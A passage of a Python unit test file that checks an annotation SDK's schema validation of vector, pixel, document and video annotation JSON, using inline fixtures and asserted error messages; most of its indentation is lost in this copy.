            self.assertIn("metadatafieldrequired", out.getvalue().strip().replace(" ", ""))

    def test_validate_annotation_invalid_date_time_format(self):
        # Six fractional digits (microseconds) are rejected by the schema.
        # FIX: assertRaisesRegexp is a deprecated alias; use assertRaisesRegex.
        with self.assertRaisesRegex(ValidationError, "does not match expected format YYYY-MM-DDTHH:MM:SS.fffZ"):
            TimedBaseModel(createdAt="2021-11-02T15:11:50.065000Z")

    def test_validate_annotation_valid_date_time_format(self):
        # Millisecond precision round-trips unchanged.
        self.assertEqual(TimedBaseModel(createdAt="2021-11-02T15:11:50.065Z").created_at, "2021-11-02T15:11:50.065Z")

    def test_validate_annotation_invalid_color_format(self):
        # FIX: assertRaisesRegexp is a deprecated alias; use assertRaisesRegex.
        with self.assertRaisesRegex(ValidationError, "1 validation error for PixelAnnotationPart"):
            PixelAnnotationPart(color="fd435eraewf4rewf")

    def test_validate_annotation_valid_color_format(self):
        # A "#rrggbb" color string is accepted as-is.
        self.assertEqual(PixelAnnotationPart(color="#f1f2f3").color, "#f1f2f3")
class TestTypeHandling(TestCase):
ANNOTATION = """
{
"metadata": {
"name": "example_image_1.jpg",
"width": 1024,
"height": 683,
"status": "Completed",
"pinned": false,
"isPredicted": null,
"projectId": null,
"annotatorEmail": null,
"qaEmail": null
},
"instances": [
{
"type": "invalid_type",
"classId": 72274,
"probability": 100,
"points": {
"x2": 465.23,
"y1": 341.5,
"y2": 357.09
},
"groupId": 0,
"pointLabels": {},
"locked": false,
"visible": false,
"attributes": [
{
"id": 117845,
"groupId": 28230,
"name": "2",
"groupName": "Num doors"
}
],
"trackingId": "aaa97f80c9e54a5f2dc2e920fc92e5033d9af45b",
"error": null,
"createdAt": null,
"createdBy": null,
"creationType": null,
"updatedAt": null,
"updatedBy": null,
"className": "Personal vehicle"
}
]
}
"""
TEST_VECTOR_FOLDER_PATH = "data_set/sample_project_vector"
VECTOR_JSON = "example_image_1.jpg___objects.json"
@property
def vector_folder_path(self):
return os.path.join(dirname(dirname(__file__)), self.TEST_VECTOR_FOLDER_PATH)
def test_validate_document_annotation_without_classname(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_document_annotation_without_classname.json",
"w") as test_validate_document_annotation_without_classname:
test_validate_document_annotation_without_classname.write(
'''
{
"metadata": {
"name": "text_file_example_1",
"status": "NotStarted",
"url": "https://sa-public-files.s3.us-west-2.amazonaws.com/Text+project/text_file_example_1.txt",
"projectId": 167826,
"annotatorEmail": null,
"qaEmail": null,
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636620976450
}
},
"instances": [{
"start": 253,
"end": 593,
"classId": -1,
"createdAt": "2021-10-22T10:40:26.151Z",
"createdBy": {
"email": "some.email@gmail.com",
"role": "Admin"
},
"updatedAt": "2021-10-22T10:40:29.953Z",
"updatedBy": {
"email": "some.email@gmail.com",
"role": "Admin"
},
"attributes": [],
"creationType": "Manual"
}],
"tags": [],
"freeText": ""
}
'''
)
self.assertTrue(sa.validate_annotations("Document", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_document_annotation_without_classname.json")))
def test_validate_annotation_with_wrong_bbox(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/vector.json", "w") as vector_json:
vector_json.write(self.ANNOTATION)
with catch_prints() as out:
sa.validate_annotations("Vector", os.path.join(self.vector_folder_path, f"{tmpdir_name}/vector.json"))
self.assertEqual(
"instances[0].typeinvalidtype,validtypesarebbox,template,cuboid,polygon,point,polyline,ellipse,rbbox",
out.getvalue().strip().replace(" ", "")
)
def test_validate_document_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/doc.json", "w") as doc_json:
doc_json.write(
'''
{
"metadata": {
"name": "text_file_example_1",
"status": "NotStarted",
"url": "https://sa-public-files.s3.us-west-2.amazonaws.com/Text+project/text_file_example_1.txt",
"projectId": 167826,
"annotatorEmail": null,
"qaEmail": null,
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636620976450
}
},
"instances": [],
"tags": [],
"freeText": ""
}
'''
)
self.assertTrue(
sa.validate_annotations("Document", os.path.join(self.vector_folder_path, f"{tmpdir_name}/doc.json")))
def test_validate_pixel_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/pixel.json", "w") as pix_json:
pix_json.write(
'''
{
"metadata": {
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636627539398
},
"width": 1024,
"height": 683,
"name": "example_image_1.jpg",
"projectId": 164324,
"isPredicted": false,
"isSegmented": false,
"status": "NotStarted",
"pinned": false,
"annotatorEmail": null,
"qaEmail": null
},
"comments": [],
"tags": [],
"instances": []
}
'''
)
self.assertTrue(
sa.validate_annotations("Pixel", os.path.join(self.vector_folder_path, f"{tmpdir_name}/pixel.json")))
def test_validate_video_export_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/video_export.json", "w") as video_export:
video_export.write(
'''
{
"metadata": {
"name": "video.mp4",
"width": 848,
"height": 476,
"status": "NotStarted",
"url": "https://file-examples-com.github.io/uploads/2017/04/file_example_MP4_480_1_5MG.mp4",
"duration": 2817000,
"projectId": 164334,
"error": null,
"annotatorEmail": null,
"qaEmail": null,
"lastAction": {
"timestamp": 1636384061135,
"email": "some.email@gmail.com"
}
},
"instances": [],
"tags": []
}
'''
)
self.assertTrue(sa.validate_annotations("Video", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/video_export.json")))
def test_validate_vector_empty_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/vector_empty.json", "w") as vector_empty:
vector_empty.write(
'''
{
"metadata": {
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636627956948
},
"width": 1024,
"height": 683,
"name": "example_image_1.jpg",
"projectId": 162462,
"isPredicted": false,
"status": "NotStarted",
"pinned": false,
"annotatorEmail": null,
"qaEmail": null
},
"comments": [],
"tags": [],
"instances": []
}
'''
)
self.assertTrue(sa.validate_annotations("Vector", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/vector_empty.json")))
def test_validate_error_message_format(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_error_message_format.json",
"w") as test_validate_error_message_format:
test_validate_error_message_format.write(
'''
{
"metadata": {}
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Vector", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_error_message_format.json"))
self.assertIn("metadata.namefieldrequired", out.getvalue().strip().replace(" ", ""))
def test_validate_document_annotation_wrong_class_id(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_document_annotation_wrong_class_id.json",
"w") as test_validate_document_annotation_wrong_class_id:
test_validate_document_annotation_wrong_class_id.write(
'''
{
"metadata": {
"name": "text_file_example_1",
"status": "NotStarted",
"url": "https://sa-public-files.s3.us-west-2.amazonaws.com/Text+project/text_file_example_1.txt",
"projectId": 167826,
"annotatorEmail": null,
"qaEmail": null,
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636620976450
}
},
"instances": [{
"start": 253,
"end": 593,
"classId": "string",
"createdAt": "2021-10-22T10:40:26.151Z",
"createdBy": {
"email": "some.email@gmail.com",
"role": "Admin"
},
"updatedAt": "2021-10-22T10:40:29.953Z",
"updatedBy": {
"email": "some.email@gmail.com",
"role": "Admin"
},
"attributes": [],
"creationType": "Manual",
"className": "vid"
}],
"tags": [],
"freeText": ""
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Document", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_document_annotation_wrong_class_id.json"))
self.assertIn("instances[0].classIdintegertypeexpected", out.getvalue().strip().replace(" ", ""))
def test_validate_document_annotation_with_null_created_at(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_document_annotation_with_null_created_at.json",
"w") as test_validate_document_annotation_with_null_created_at:
test_validate_document_annotation_with_null_created_at.write(
'''
{
"metadata": {
"name": "text_file_example_1",
"status": "NotStarted",
"url": "https://sa-public-files.s3.us-west-2.amazonaws.com/Text+project/text_file_example_1.txt",
"projectId": 167826,
"annotatorEmail": null,
"qaEmail": null,
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636620976450
}
},
"instances": [{
"start": 253,
"end": 593,
"classId": 1,
"createdAt": null,
"createdBy": {
"email": "some.email@gmail.com",
"role": "Admin"
},
"updatedAt": null,
"updatedBy": {
"email": "some.email@gmail.com",
"role": "Admin"
},
"attributes": [],
"creationType": "Manual",
"className": "vid"
}],
"tags": [],
"freeText": ""
}
'''
)
self.assertTrue(sa.validate_annotations("Document", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_document_annotation_with_null_created_at.json")))
def test_validate_vector_instace_type_and_attr_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_vector_instace_type_and_attr_annotation.json",
"w") as test_validate_vector_instace_type_and_attr_annotation:
test_validate_vector_instace_type_and_attr_annotation.write(
'''
{
"metadata": {
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636958573242
},
"width": 1234,
"height": 1540,
"name": "t.png",
"projectId": 164988,
"isPredicted": false,
"status": "Completed",
"pinned": false,
"annotatorEmail": null,
"qaEmail": null
},
"comments": [],
"tags": [],
"instances": [
{
"classId": 880080,
"probability": 100,
"points": {
"x1": 148.99,
"x2": 1005.27,
"y1": 301.96,
"y2": 1132.36
},
"groupId": 0,
"pointLabels": {},
"locked": false,
"visible": true,
"attributes": [],
"trackingId": null,
"error": null,
"createdAt": "2021-11-15T06:43:09.812Z",
"createdBy": {
"email": "shab.prog@gmail.com",
"role": "Admin"
},
"creationType": "Manual",
"updatedAt": "2021-11-15T06:43:13.831Z",
"updatedBy": {
"email": "shab.prog@gmail.com",
"role": "Admin"
},
"className": "kj"
}
]
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Vector", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_vector_instace_type_and_attr_annotation.json"))
self.assertIn("instances[0].typefieldrequired", out.getvalue().strip().replace(" ", ""))
def test_validate_vector_invalid_instace_type_and_attr_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_vector_invalid_instace_type_and_attr_annotation.json",
"w") as test_validate_vector_invalid_instace_type_and_attr_annotation:
test_validate_vector_invalid_instace_type_and_attr_annotation.write(
'''
{
"metadata": {
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636958573242
},
"width": 1234,
"height": 1540,
"name": "t.png",
"projectId": 164988,
"isPredicted": false,
"status": "Completed",
"pinned": false,
"annotatorEmail": null,
"qaEmail": null
},
"comments": [],
"tags": [],
"instances": [
{
"type": "bad_type",
"classId": 880080,
"probability": 100,
"points": {
"x1": 148.99,
"x2": 1005.27,
"y1": 301.96,
"y2": 1132.36
},
"groupId": 0,
"pointLabels": {},
"locked": false,
"visible": true,
"attributes": [],
"trackingId": null,
"error": null,
"createdAt": "2021-11-15T06:43:09.812Z",
"createdBy": {
"email": "shab.prog@gmail.com",
"role": "Admin"
},
"creationType": "Manual",
"updatedAt": "2021-11-15T06:43:13.831Z",
"updatedBy": {
"email": "shab.prog@gmail.com",
"role": "Admin"
},
"className": "kj"
}
]
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Vector", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_vector_invalid_instace_type_and_attr_annotation.json"))
self.assertIn(
"instances[0].typeinvalidtype,validtypesarebbox,template,cuboid,polygon,point,polyline,ellipse,rbbox",
out.getvalue().strip().replace(" ", ""))
def test_validate_video_invalid_instace_type_and_attr_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_video_invalid_instace_type_and_attr_annotation.json",
"w") as test_validate_video_invalid_instace_type_and_attr_annotation:
test_validate_video_invalid_instace_type_and_attr_annotation.write(
'''
{
"metadata": {
"name": "video.mp4",
"width": 480,
"height": 270,
"status": "NotStarted",
"url": "https://file-examples-com.github.io/uploads/2017/04/file_example_MP4_480_1_5MG.mp4",
"duration": 30526667,
"projectId": 152038,
"error": null,
"annotatorEmail": null,
"qaEmail": null
},
"instances": [
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"pointLabels": {
"3": "point label bro"
},
"start": 0,
"end": 30526667
},
"parameters": [
{
"start": 0,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 223.32,
"y1": 78.45,
"x2": 312.31,
"y2": 176.66
},
"timestamp": 0,
"attributes": []
},
{
"points": {
"x1": 182.08,
"y1": 33.18,
"x2": 283.45,
"y2": 131.39
},
"timestamp": 17271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.32,
"y1": 36.33,
"x2": 284.01,
"y2": 134.54
},
"timestamp": 18271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 45.09,
"x2": 283.18,
"y2": 143.3
},
"timestamp": 19271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.9,
"y1": 48.35,
"x2": 283.59,
"y2": 146.56
},
"timestamp": 19725864,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 52.46,
"x2": 283.18,
"y2": 150.67
},
"timestamp": 20271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 63.7,
"x2": 283.18,
"y2": 161.91
},
"timestamp": 21271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 72.76,
"x2": 283.76,
"y2": 170.97
},
"timestamp": 22271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 81.51,
"x2": 283.76,
"y2": 179.72
},
"timestamp": 23271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 24271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 30526667,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
},
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"start": 29713736,
"end": 30526667
},
"parameters": [
{
"start": 29713736,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 29713736,
"attributes": []
},
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 30526667,
"attributes": []
}
]
}
]
},
{
"meta": {
"type": "bad_type",
"classId": 859496,
"className": "vid",
"start": 5528212,
"end": 7083022
},
"parameters": [
{
"start": 5528212,
"end": 7083022,
"timestamps": [
{
"timestamp": 5528212,
"attributes": []
},
{
"timestamp": 6702957,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"timestamp": 7083022,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
}
],
"tags": [
"some tag"
]
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Video", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_video_invalid_instace_type_and_attr_annotation.json"))
self.assertIn("instances[2].meta.typeinvalidtype,validtypesarebbox,event",
out.getvalue().strip().replace(" ", ""))
def test_validate_video_invalid_instace_without_type_and_attr_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_video_invalid_instace_without_type_and_attr_annotation.json",
"w") as test_validate_video_invalid_instace_without_type_and_attr_annotation:
test_validate_video_invalid_instace_without_type_and_attr_annotation.write(
'''
{
"metadata": {
"name": "video.mp4",
"width": 480,
"height": 270,
"status": "NotStarted",
"url": "https://file-examples-com.github.io/uploads/2017/04/file_example_MP4_480_1_5MG.mp4",
"duration": 30526667,
"projectId": 152038,
"error": null,
"annotatorEmail": null,
"qaEmail": null
},
"instances": [
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"pointLabels": {
"3": "point label bro"
},
"start": 0,
"end": 30526667
},
"parameters": [
{
"start": 0,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 223.32,
"y1": 78.45,
"x2": 312.31,
"y2": 176.66
},
"timestamp": 0,
"attributes": []
},
{
"points": {
"x1": 182.08,
"y1": 33.18,
"x2": 283.45,
"y2": 131.39
},
"timestamp": 17271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.32,
"y1": 36.33,
"x2": 284.01,
"y2": 134.54
},
"timestamp": 18271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 45.09,
"x2": 283.18,
"y2": 143.3
},
"timestamp": 19271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.9,
"y1": 48.35,
"x2": 283.59,
"y2": 146.56
},
"timestamp": 19725864,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 52.46,
"x2": 283.18,
"y2": 150.67
},
"timestamp": 20271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 63.7,
"x2": 283.18,
"y2": 161.91
},
"timestamp": 21271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 72.76,
"x2": 283.76,
"y2": 170.97
},
"timestamp": 22271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 81.51,
"x2": 283.76,
"y2": 179.72
},
"timestamp": 23271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 24271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 30526667,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
},
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"start": 29713736,
"end": 30526667
},
"parameters": [
{
"start": 29713736,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 29713736,
"attributes": []
},
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 30526667,
"attributes": []
}
]
}
]
},
{
"meta": {
"classId": 859496,
"className": "vid",
"start": 5528212,
"end": 7083022
},
"parameters": [
{
"start": 5528212,
"end": 7083022,
"timestamps": [
{
"timestamp": 5528212,
"attributes": []
},
{
"timestamp": 6702957,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"timestamp": 7083022,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
}
],
"tags": [
"some tag"
]
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Video", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_video_invalid_instace_without_type_and_attr_annotation.json"))
self.assertIn("instances[2].meta.typefieldrequired", out.getvalue().strip().replace(" ", ""))
def test_validate_vector_temlpate_polygon_polyline_min_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_vector_temlpate_polygon_polyline_min_annotation.json",
"w") as test_validate_vector_temlpate_polygon_polyline_min_annotation:
test_validate_vector_temlpate_polygon_polyline_min_annotation.write(
'''
{
"metadata": {
"lastAction": {
"email": "some@some.com",
"timestamp": 1636964198056
},
"width": "1234",
"height": 1540,
"name": "t.png",
"projectId": 164988,
"isPredicted": false,
"status": "Completed",
"pinned": false,
"annotatorEmail": null,
"qaEmail": null
},
"comments": [],
"tags": [],
"instances": [
{
"type": "template",
"classId": 880080,
"probability": 100,
"points": [
],
"connections": [
{
"id": 1,
"from": 1,
"to": 2
}
],
"groupId": 0,
"pointLabels": {},
"locked": false,
"visible": true,
"attributes": [],
"templateId": 4728,
"trackingId": null,
"error": null,
"createdAt": "2021-11-15T08:24:40.712Z",
"createdBy": {
"email": "shab.prog@gmail.com",
"role": "Admin"
},
"creationType": "Manual",
"updatedAt": "2021-11-15T08:24:46.440Z",
"updatedBy": {
"email": "shab.prog@gmail.com",
"role": "Admin"
},
"className": "kj",
"templateName": "templ1"
},
{
"type": "polygon",
"classId": 880080,
"probability": 100,
"points": [
233.69
],
"groupId": 0,
"pointLabels": {},
"locked": true,
"visible": true,
"attributes": [],
"trackingId": null,
"error": null,
"createdAt": "2021-11-15T08:18:16.103Z",
"createdBy": {
"email": "some@some.com",
"role": "Admin"
},
"creationType": "Manual",
"updatedAt": "2021-11-15T08:18:20.233Z",
"updatedBy": {
"email": "some@some.com",
"role": "Admin"
},
"className": "kj"
},
{
"type": "polyline",
"classId": 880080,
"probability": 100,
"points": [
218.22
],
"groupId": 0,
"pointLabels": {},
"locked": false,
"visible": true,
"attributes": [],
"trackingId": null,
"error": null,
"createdAt": "2021-11-15T08:18:06.203Z",
"createdBy": {
"email": "some@some.com",
"role": "Admin"
},
"creationType": "Manual",
"updatedAt": "2021-11-15T08:18:13.439Z",
"updatedBy": {
"email": "some@some.com",
"role": "Admin"
},
"className": "kj"
},
{
"type": "bbox",
"classId": 880080,
"probability": 100,
"points": {
"x1": 487.78,
"x2": 1190.87,
"y1": 863.91,
"y2": 1463.78
},
"groupId": 0,
"pointLabels": {},
"locked": false,
"visible": true,
"attributes": [],
"trackingId": null,
"error": null,
"createdAt": "2021-11-15T06:43:09.812Z",
"createdBy": {
"email": "some@some.com",
"role": "Admin"
},
"creationType": "Manual",
"updatedAt": "2021-11-15T08:16:48.807Z",
"updatedBy": {
"email": "some@some.com",
"role": "Admin"
},
"className": "kj"
}
]
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Vector", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_vector_temlpate_polygon_polyline_min_annotation.json"))
self.assertEqual(
"metadata.widthintegertypeexpected\ninstances[0].pointsensurethisvaluehasatleast1items\ninstances[1].pointsensurethisvaluehasatleast3items\ninstances[2].pointsensurethisvaluehasatleast2items",
out.getvalue().strip().replace(" ", ""))
def test_validate_video_point_labels(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_video_point_labels.json",
"w") as test_validate_video_point_labels:
test_validate_video_point_labels.write(
'''
{
"metadata": {
"name": "video.mp4",
"width": 480,
"height": 270,
"status": "NotStarted",
"url": "https://file-examples-com.github.io/uploads/2017/04/file_example_MP4_480_1_5MG.mp4",
"duration": 30526667,
"projectId": 152038,
"error": null,
"annotatorEmail": null,
"qaEmail": null
},
"instances": [
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"pointLabels": "bad_point_label",
"start": 0,
"end": 30526667
},
"parameters": [
{
"start": 0,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 223.32,
"y1": 78.45,
"x2": 312.31,
"y2": 176.66
},
"timestamp": 0,
"attributes": []
},
{
"points": {
"x1": 182.08,
"y1": 33.18,
"x2": 283.45,
"y2": 131.39
},
"timestamp": 17271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.32,
"y1": 36.33,
"x2": 284.01,
"y2": 134.54
},
"timestamp": 18271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 45.09,
"x2": 283.18,
"y2": 143.3
},
"timestamp": 19271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.9,
"y1": 48.35,
"x2": 283.59,
"y2": 146.56
},
"timestamp": 19725864,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 52.46,
"x2": 283.18,
"y2": 150.67
},
"timestamp": 20271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 63.7,
"x2": 283.18,
"y2": 161.91
},
"timestamp": 21271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 72.76,
"x2": 283.76,
"y2": 170.97
},
"timestamp": 22271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 81.51,
"x2": 283.76,
"y2": 179.72
},
"timestamp": 23271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 24271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 30526667,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
},
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"start": 29713736,
"end": 30526667
},
"parameters": [
{
"start": 29713736,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 29713736,
"attributes": []
},
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 30526667,
"attributes": []
}
]
}
]
},
{
"meta": {
"type": "event",
"classId": 859496,
"className": "vid",
"start": 5528212,
"end": 7083022
},
"parameters": [
{
"start": 5528212,
"end": 7083022,
"timestamps": [
{
"timestamp": 5528212,
"attributes": []
},
{
"timestamp": 6702957,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"timestamp": 7083022,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
}
],
"tags": [
"some tag"
]
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Video", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_video_point_labels.json"))
self.assertIn(
"instances[0].meta.pointLabelsvalueisnotavaliddict",
out.getvalue().strip().replace(" ", ""))
def test_validate_video_point_labels_bad_keys(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_video_point_labels_bad_keys.json",
"w") as test_validate_video_point_labels_bad_keys:
test_validate_video_point_labels_bad_keys.write(
'''
{
"metadata": {
"name": "video.mp4",
"width": 480,
"height": 270,
"status": "NotStarted",
"url": "https://file-examples-com.github.io/uploads/2017/04/file_example_MP4_480_1_5MG.mp4",
"duration": 30526667,
"projectId": 152038,
"error": null,
"annotatorEmail": null,
"qaEmail": null
},
"instances": [
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"pointLabels": {
"bad_key_1" : "a",
"bad_key_2" : "b",
" " : "afsd",
"1" : ["fasdf","sdfsdf"]
},
"start": 0,
"end": 30526667
},
"parameters": [
{
"start": 0,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 223.32,
"y1": 78.45,
"x2": 312.31,
"y2": 176.66
},
"timestamp": 0,
"attributes": []
},
{
"points": {
"x1": 182.08,
"y1": 33.18,
"x2": 283.45,
"y2": 131.39
},
"timestamp": 17271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.32,
"y1": 36.33,
"x2": 284.01,
"y2": 134.54
},
"timestamp": 18271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 45.09,
"x2": 283.18,
"y2": 143.3
},
"timestamp": 19271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
